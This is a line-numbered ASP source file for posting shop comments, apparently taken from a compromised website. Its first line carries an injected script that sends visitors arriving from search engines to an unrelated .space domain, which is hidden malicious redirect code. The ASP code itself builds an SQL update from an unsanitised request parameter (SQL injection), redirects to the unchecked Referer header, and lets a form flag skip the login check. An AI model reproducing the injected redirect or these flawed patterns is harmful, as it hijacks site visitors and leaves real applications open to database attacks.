d:\wwwroot\wuchunhua\shop_re.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="inc/conn.asp"-->
002:
<!--#include file="inc/function.asp"-->
003:
004:
<%
005:
dim nm,username,id
006:
id=trim(request("id"))
007:
nm=Request.form("nm")
008:
username=request("username")
009:
hfname=request.cookies("kqiqi")("username")
010:
n=trim(request("n"))
011:
ncom=trim(request("ncom"))
012:
if n="" then
013:
response.write "<li>参数错误!"
014:
cl
015:
response.end
016:
end if
017:
if nm="on" then
018:
call kqiqi()
019:
else if hfname="" or request.cookies("kqiqi")("domain")="" or request.cookies("kqiqi")("id")="" then
020:
response.write "<br>"
021:
response.write "<li>你还没有登陆!"
022:
response.write "<meta http-equiv=refresh content=""2;URL=login.asp"">"
023:
response.end
024:
else
025:
' if request("kqiqi")="chk" then
026:
call kqiqi()
027:
response.end
028:
' end if
029:
end if
030:
end if
031:
%
>
032:
033:
<%
034:
sub kqiqi()
035:
dim rs,sql,neirong
036:
if len(trim(request("neirong")))<2 or len(trim(request("neirong")))>500 then
037:
response.write "<li>评论内容小于2个字或字数超过500字!"
038:
cl
039:
response.end
040:
end if
041:
set rs=server.createobject("adodb.recordset")
042:
sql = "select * from shop_reply "
043:
rs.open sql,conn,1,3
044:
rs.addnew
045:
rs("hfname")=hfname
046:
'neirong=replace(replace(request("neirong"),chr(13),"<br>")," "," ")
047:
'neirong=HtmlEncodes(request("neirong"))
048:
neirong = HTMLEncodes(Request.Form("neirong"))
049:
neirong = Replace(neirong,"[em]","<img src='../shop/images/emot/em")
050:
neirong = Replace(neirong,"[/em]",".gif'>")
051:
052:
rs("neirong")=neirong
053:
rs("sjname")=n
054:
rs("sjcom")=ncom
055:
rs("hfsj")=now()
056:
rs("mi")=request("mi")
057:
rs.update
058:
rs.close
059:
set rs=nothing
060:
Conn.Execute("Update kqiqi_shop Set plcs=plcs+1 where username='"&n&"'")
061:
'Conn.Execute("Update kqiqi_info Set fbsj=now() where id="&cstr(id))
062:
closedb
063:
Response.Write "<script language='javascript'>alert('评论成功!!');</script>"
064:
cl
065:
end sub
066:
%
>
067:
<%
sub cl()
068:
'response.write "<meta http-equiv=refresh content=""2;URL=shop/shop2.asp?m="&n&""">"
069:
response.write "<meta http-equiv=refresh content='1;URL="&Request.ServerVariables("HTTP_REFERER")&"'>"
070:
end sub
%
>
071:
072: